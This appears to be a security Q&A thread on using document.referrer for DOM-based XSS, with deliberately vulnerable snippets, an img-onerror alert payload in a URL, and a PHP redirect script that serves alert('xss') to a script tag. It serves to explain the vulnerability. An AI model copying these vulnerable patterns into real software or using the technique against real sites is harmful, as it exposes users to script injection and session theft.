# How can document.referrer be used for XSS?

Tags: xss, javascript, dom

A very simple example...

```
<div id="cat"></div>
<script>
document.getElementById("cat").innerHTML = document.referrer;
</script>
```

or

```
<script src="' + document.referrer + '"></script>
```

I've tried simply sending the request and adding a referrer header, but that doesn't seem to echo onto the page.

Comment: Perhaps your browser has some integrated "protection" against reflected XSS.

Comment: @CodesInChaos I've tried two separate versions of Firefox. Also, I'm not setting the referrer header to anything harmful and it still doesn't work for the first example.

Comment: @CodesInChaos That always bugs me, but it is spelled "referrer".

Comment: actually for me it works both on FF and chrome

Comment: @aviv I've tried multiple times with Chrome and Firefox with the following page: http://jsfiddle.net/4zaz1uga/ and I get the same result every time.

Comment: assigning to `innerHTML` doesn't run `<script>`s.  Try `<img onerror="..." src=bogus>` instead.

Comment: @MikeSamuel Thank you, but the referrer isn't changed at all. I'm not trying to even run any javascript. For example, if I go to http://jsfiddle.net/4zaz1uga/ from here, it should display this question's URL, but instead, it shows http://jsfiddle.net.

Comment: @MichaelBlake, sorry, I misunderstood which part was the payload and which was the container.

Answer (score 5):

Updated browsers will encode the referrer URL.

So your examples will not work to trigger XSS nowadays.

Try this:

```
<div id="cat"></div>
<script>
document.getElementById("cat").innerHTML = decodeURIComponent(document.referrer);
</script>
```

JSFIDDLE:

[http://jsfiddle.net/y4afy8h9/1/?`<img%20src=x%20onerror=alert(9)>?`](http://jsfiddle.net/y4afy8h9/1/?<img%20src=x%20onerror=alert(9)>?)

Answer (score 3):

The following code is vulnerable to DOM based XSS,  because the attacker-controlled value of *document.referrer* is tracked by the browser:

```
<script src="' + document.referrer + '"></script>
```

The code above can be exploited using a page that upon first load redirects the browser to your target,  on the 2nd load it returns an  XSS payload. One way of doing this is checking the referer on the server-side:

```
<?php
if($_SERVER['HTTP_REFERER'] == 'http://target.com/xss'){
   print "alert('xss')";
}else{
   header("location: http://target.com/xss")
}
?>
```

When the page *http://target.com/xss* loads, javascript from *document.referer* it will load *alert('xss')*.